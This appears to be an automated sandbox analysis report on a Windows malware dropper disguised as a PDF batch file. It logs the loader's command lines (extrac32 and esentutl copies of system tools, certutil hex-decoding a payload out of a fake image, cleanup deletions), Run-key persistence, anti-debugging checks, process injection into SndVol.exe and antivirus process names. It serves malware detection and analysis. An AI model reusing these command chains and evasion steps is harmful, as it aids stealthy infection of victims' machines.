              Source: alpha.exe.3.dr, Static PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02D4894C LoadLibraryW,GetProcAddress,FreeLibrary,10_2_02D4894C
              Source: alpha.exe.3.dr, Static PE information: section name: .didat
              Source: kn.exe.5.dr, Static PE information: section name: .didat
              Source: alpha.pif.16.dr, Static PE information: section name: .didat
              Source: C:\Users\Public\kn.exe, Code function: 7_2_00007FF68FC33668 push rsp; ret 7_2_00007FF68FC33669
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02D363B0 push 02D3640Bh; ret 10_2_02D36403
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02D363AE push 02D3640Bh; ret 10_2_02D36403
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02D3C349 push 8B02D3C1h; ret 10_2_02D3C34E
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02D5C378 push 02D5C56Eh; ret 10_2_02D5C566
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02E0C198 push eax; ret 10_2_02E0C1B6
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02DEA166 push ecx; ret 10_2_02DEA179
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02D36782 push 02D367C6h; ret 10_2_02D367BE
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02D36784 push 02D367C6h; ret 10_2_02D367BE
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02D5C570 push 02D5C56Eh; ret 10_2_02D5C566
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02D3C56C push ecx; mov dword ptr [esp], edx 10_2_02D3C571
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02D4AADF push 02D4AB18h; ret 10_2_02D4AB10
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02D48AD8 push 02D48B10h; ret 10_2_02D48B08
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02D4AAE0 push 02D4AB18h; ret 10_2_02D4AB10
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02D3CBEC push 02D3CD72h; ret 10_2_02D3CD6A
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02DA4850 push eax; ret 10_2_02DA4920
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02D4886C push 02D488AEh; ret 10_2_02D488A6
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02D3C9DF push 02D3CD72h; ret 10_2_02D3CD6A
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02D46946 push 02D469F3h; ret 10_2_02D469EB
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02D46948 push 02D469F3h; ret 10_2_02D469EB
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02D42F60 push 02D42FD6h; ret 10_2_02D42FCE
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02D5D2FC push 02D5D367h; ret 10_2_02D5D35F
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02D3332C push eax; ret 10_2_02D33368
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02D5D0AC push 02D5D125h; ret 10_2_02D5D11D
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02D4306C push 02D430B9h; ret 10_2_02D430B1
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02D4306B push 02D430B9h; ret 10_2_02D430B1
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02D5D1F8 push 02D5D288h; ret 10_2_02D5D280
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02D5D144 push 02D5D1ECh; ret 10_2_02D5D1E4
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02D4F108 push ecx; mov dword ptr [esp], edx 10_2_02D4F10D
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02D3D5A0 push 02D3D5CCh; ret 10_2_02D3D5C4
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02E0B876 push ecx; ret 10_2_02E0B889

              Persistence and Installation Behavior

              Source: C:\Windows\SysWOW64\esentutl.exe, File created: C:\Users\Public\Libraries\Faogvkgh.PIF
              Source: C:\Windows\SysWOW64\esentutl.exe, File created: C:\Users\Public\alpha.pif
              Source: C:\Windows\SysWOW64\esentutl.exe, File created: C:\Users\Public\xpha.pif
              Source: C:\Users\Public\kn.exe, File created: C:\Users\Public\Libraries\AnyDesk.PIF
              Source: C:\Windows\System32\extrac32.exe, File created: C:\Users\Public\alpha.exe
              Source: C:\Windows\System32\extrac32.exe, File created: C:\Users\Public\kn.exe

              Boot Survival

              Source: C:\Windows\SysWOW64\esentutl.exe, File created: C:\Users\Public\alpha.pif
              Source: C:\Windows\System32\extrac32.exe, File created: C:\Users\Public\alpha.exe
              Source: C:\Windows\SysWOW64\esentutl.exe, File created: C:\Users\Public\xpha.pif
              Source: C:\Windows\System32\extrac32.exe, File created: C:\Users\Public\kn.exe
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Faogvkgh

              Hooking and other Techniques for Hiding and Protection

              Source: Possible double extension: pdf.bat, Static PE information: USD470900_COPY_800BLHSBC882001.PDF.bat
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02D4AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_02D4AB1C
              Source: C:\Windows\System32\cmd.exe, Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exe, Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\SndVol.exe, Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\Faogvkgh.PIF, Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\SndVol.exe, Window / User API: threadDelayed 4346
              Source: C:\Windows\SysWOW64\SndVol.exe, Window / User API: threadDelayed 5645
              Source: C:\Windows\SysWOW64\esentutl.exe, Dropped PE file which has not been started: C:\Users\Public\xpha.pif
              Source: C:\Users\Public\alpha.exe, API coverage: 8.3 %
              Source: C:\Users\Public\kn.exe, API coverage: 0.8 %
              Source: C:\Windows\SysWOW64\SndVol.exe TID: 8096, Thread sleep count: 4346 > 30
              Source: C:\Windows\SysWOW64\SndVol.exe TID: 8096, Thread sleep time: -13038000s >= -30000s
              Source: C:\Windows\SysWOW64\SndVol.exe TID: 8096, Thread sleep count: 5645 > 30
              Source: C:\Windows\SysWOW64\SndVol.exe TID: 8096, Thread sleep time: -16935000s >= -30000s
              Source: C:\Windows\System32\conhost.exe, Last function: Thread delayed
              Source: C:\Users\Public\alpha.exe, Code function: 4_2_00007FF6A0E82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,4_2_00007FF6A0E82978
              Source: C:\Users\Public\alpha.exe, Code function: 4_2_00007FF6A0E8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF6A0E8823C
              Source: C:\Users\Public\alpha.exe, Code function: 4_2_00007FF6A0E735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,4_2_00007FF6A0E735B8
              Source: C:\Users\Public\alpha.exe, Code function: 4_2_00007FF6A0E71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00007FF6A0E71560
              Source: C:\Users\Public\alpha.exe, Code function: 4_2_00007FF6A0E97B4C FindFirstFileW,FindNextFileW,FindClose,4_2_00007FF6A0E97B4C
              Source: C:\Users\Public\alpha.exe, Code function: 6_2_00007FF6A0E82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,6_2_00007FF6A0E82978
              Source: C:\Users\Public\alpha.exe, Code function: 6_2_00007FF6A0E8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,6_2_00007FF6A0E8823C
              Source: C:\Users\Public\alpha.exe, Code function: 6_2_00007FF6A0E735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,6_2_00007FF6A0E735B8
              Source: C:\Users\Public\alpha.exe, Code function: 6_2_00007FF6A0E71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,6_2_00007FF6A0E71560
              Source: C:\Users\Public\alpha.exe, Code function: 6_2_00007FF6A0E97B4C FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF6A0E97B4C
              Source: C:\Users\Public\kn.exe, Code function: 7_2_00007FF68FCE3100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF68FCE3100
              Source: C:\Users\Public\kn.exe, Code function: 7_2_00007FF68FCE10C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF68FCE10C4
              Source: C:\Users\Public\kn.exe, Code function: 7_2_00007FF68FCE6F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,7_2_00007FF68FCE6F80
              Source: C:\Users\Public\kn.exe, Code function: 7_2_00007FF68FC7C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,7_2_00007FF68FC7C6F8
              Source: C:\Users\Public\kn.exe, Code function: 7_2_00007FF68FCE234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,7_2_00007FF68FCE234C
              Source: C:\Users\Public\kn.exe, Code function: 7_2_00007FF68FC85E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,7_2_00007FF68FC85E58
              Source: C:\Users\Public\kn.exe, Code function: 7_2_00007FF68FC8DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,7_2_00007FF68FC8DBC0
              Source: C:\Users\Public\kn.exe, Code function: 7_2_00007FF68FCE1B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,7_2_00007FF68FCE1B04
              Source: C:\Users\Public\kn.exe, Code function: 7_2_00007FF68FCE19F8 #359,FindFirstFileW,FindNextFileW,FindClose,7_2_00007FF68FCE19F8
              Source: C:\Users\Public\kn.exe, Code function: 7_2_00007FF68FCC3674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,7_2_00007FF68FCC3674
              Source: C:\Users\Public\kn.exe, Code function: 7_2_00007FF68FC8D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,7_2_00007FF68FC8D4A4
              Source: C:\Users\Public\kn.exe, Code function: 7_2_00007FF68FC4D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68FC4D440
              Source: C:\Users\Public\kn.exe, Code function: 7_2_00007FF68FC8B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,7_2_00007FF68FC8B3D8
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02D35908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,10_2_02D35908
              Source: C:\Users\Public\kn.exe, Code function: 7_2_00007FF68FCC511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,7_2_00007FF68FCC511C
              Source: AnyDesk.PIF, 0000000A.00000002.1493586816.0000000000865000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAWPn
              Source: AnyDesk.PIF, 0000000A.00000002.1493586816.0000000000865000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1493586816.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000014.00000002.3879565990.000000001C118000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000014.00000003.1537139558.000000001C198000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000014.00000002.3879867205.000000001C198000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW
              Source: Faogvkgh.PIF, 00000016.00000002.1638185112.00000000005EC000.00000004.00000020.00020000.00000000.sdmp, Faogvkgh.PIF, 00000018.00000002.1715016353.00000000005D8000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, API call chain: ExitProcess graph end node

              Anti Debugging

              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02D4F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,10_2_02D4F744
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Process queried: DebugPort
              Source: C:\Users\Public\Libraries\Faogvkgh.PIF, Process queried: DebugPort
              Source: C:\Users\Public\alpha.exe, Code function: 4_2_00007FF6A0E963FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,4_2_00007FF6A0E963FC
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02D4894C LoadLibraryW,GetProcAddress,FreeLibrary,10_2_02D4894C
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02DF7D45 mov eax, dword ptr fs:[00000030h] 10_2_02DF7D45
              Source: C:\Users\Public\alpha.exe, Code function: 4_2_00007FF6A0E84A14 GetEnvironmentStringsW,GetProcessHeap,HeapAlloc,memmove,FreeEnvironmentStringsW,4_2_00007FF6A0E84A14
              Source: C:\Users\Public\alpha.exe, Code function: 4_2_00007FF6A0E893B0 SetUnhandledExceptionFilter,4_2_00007FF6A0E893B0
              Source: C:\Users\Public\alpha.exe, Code function: 4_2_00007FF6A0E88FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF6A0E88FA4
              Source: C:\Users\Public\alpha.exe, Code function: 6_2_00007FF6A0E893B0 SetUnhandledExceptionFilter,6_2_00007FF6A0E893B0
              Source: C:\Users\Public\alpha.exe, Code function: 6_2_00007FF6A0E88FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF6A0E88FA4
              Source: C:\Users\Public\kn.exe, Code function: 7_2_00007FF68FD14E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FF68FD14E18
              Source: C:\Users\Public\kn.exe, Code function: 7_2_00007FF68FD153E0 SetUnhandledExceptionFilter,7_2_00007FF68FD153E0

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\Public\Libraries\Faogvkgh.PIF, Process created / APC Queued / Resumed: C:\Windows\SysWOW64\SndVol.exe
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Process created / APC Queued / Resumed: C:\Windows\SysWOW64\SndVol.exe
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Memory allocated: C:\Windows\SysWOW64\SndVol.exe base: 2CF0000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Faogvkgh.PIF, Memory allocated: C:\Windows\SysWOW64\SndVol.exe base: 2C00000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Faogvkgh.PIF, Memory allocated: C:\Windows\SysWOW64\SndVol.exe base: 27D0000 protect: page execute and read and write
              Source: C:\Windows\System32\extrac32.exe, File created: C:\Users\Public\kn.exe
              Source: C:\Windows\System32\extrac32.exe, File created: C:\Users\Public\alpha.exe
              Source: C:\Windows\SysWOW64\esentutl.exe, File created: C:\Users\Public\alpha.pif
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Thread APC queued: target process: C:\Windows\SysWOW64\SndVol.exe
              Source: C:\Users\Public\kn.exe, Code function: 7_2_00007FF68FCC7024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356,7_2_00007FF68FCC7024
              Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
              Source: C:\Windows\System32\cmd.exe, Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
              Source: C:\Windows\System32\cmd.exe, Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9
              Source: C:\Windows\System32\cmd.exe, Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
              Source: C:\Windows\System32\cmd.exe, Process created: C:\Users\Public\Libraries\AnyDesk.PIF C:\Users\Public\Libraries\AnyDesk.PIF
              Source: C:\Windows\System32\cmd.exe, Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
              Source: C:\Windows\System32\cmd.exe, Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S
              Source: C:\Users\Public\alpha.exe, Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
              Source: C:\Users\Public\alpha.exe, Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9
              Source: C:\Users\Public\alpha.exe, Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
              Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
              Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
              Source: C:\Users\Public\Libraries\Faogvkgh.PIF, Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
              Source: C:\Users\Public\kn.exe, Code function: 7_2_00007FF68FCB4AF4 GetSecurityDescriptorDacl,GetLastError,SetEntriesInAclW,SetSecurityDescriptorDacl,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,7_2_00007FF68FCB4AF4
              Source: C:\Users\Public\kn.exe, Code function: 7_2_00007FF68FCB4E88 DsRoleGetPrimaryDomainInformation,#357,AllocateAndInitializeSid,GetLastError,#357,AllocateAndInitializeSid,GetLastError,#357,#357,DsRoleFreeMemory,LocalFree,#357,LocalFree,LocalFree,LocalFree,7_2_00007FF68FCB4E88
              Source: SndVol.exe, 00000014.00000002.3879565990.000000001C176000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Program Manager
              Source: SndVol.exe, 00000014.00000002.3879565990.000000001C176000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Program Manager-
              Source: SndVol.exe, 00000014.00000002.3879565990.000000001C176000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Program ManagerR
              Source: SndVol.exe, 00000014.00000002.3879565990.000000001C118000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000014.00000002.3879565990.000000001C158000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: |Program Manager|
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: 10_2_02DE9F6A cpuid 10_2_02DE9F6A
              Source: C:\Users\Public\alpha.exe, Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,4_2_00007FF6A0E851EC
              Source: C:\Users\Public\alpha.exe, Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,4_2_00007FF6A0E83140
              Source: C:\Users\Public\alpha.exe, Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,4_2_00007FF6A0E76EE4
              Source: C:\Users\Public\alpha.exe, Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,6_2_00007FF6A0E851EC
              Source: C:\Users\Public\alpha.exe, Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,6_2_00007FF6A0E83140
              Source: C:\Users\Public\alpha.exe, Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,6_2_00007FF6A0E76EE4
              Source: C:\Users\Public\kn.exe, Code function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,7_2_00007FF68FD13800
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,10_2_02D35ACC
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: GetLocaleInfoA,10_2_02D3A7C4
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: GetLocaleInfoA,10_2_02D3A810
              Source: C:\Users\Public\Libraries\AnyDesk.PIF, Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,10_2_02D35BD8
              Source: C:\Windows\System32\cmd.exe, Queries volume information: C:\ VolumeInformation
              Source: C:\Users\Public\alpha.exe, Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\cmd.exe, Queries volume information: C:\ VolumeInformation
              Source: C:\Users\Public\alpha.exe, Code function: 4_2_00007FF6A0E89584 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,4_2_00007FF6A0E89584
              Source: C:\Users\Public\kn.exe, Code function: 7_2_00007FF68FCF70F4 LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LocalAlloc,LookupAccountNameW,GetLastError,ConvertSidToStringSidW,GetLastError,#357,LocalFree,LocalFree,LocalFree,7_2_00007FF68FCF70F4
              Source: C:\Users\Public\alpha.exe, Code function: 4_2_00007FF6A0E7586C GetVersion,4_2_00007FF6A0E7586C
              Source: C:\Windows\SysWOW64\SndVol.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: cmdagent.exe
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: quhlpsvc.exe
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: avgamsvr.exe
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: TMBMSRV.exe
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: Vsserv.exe
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: avgupsvc.exe
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: avgemc.exe
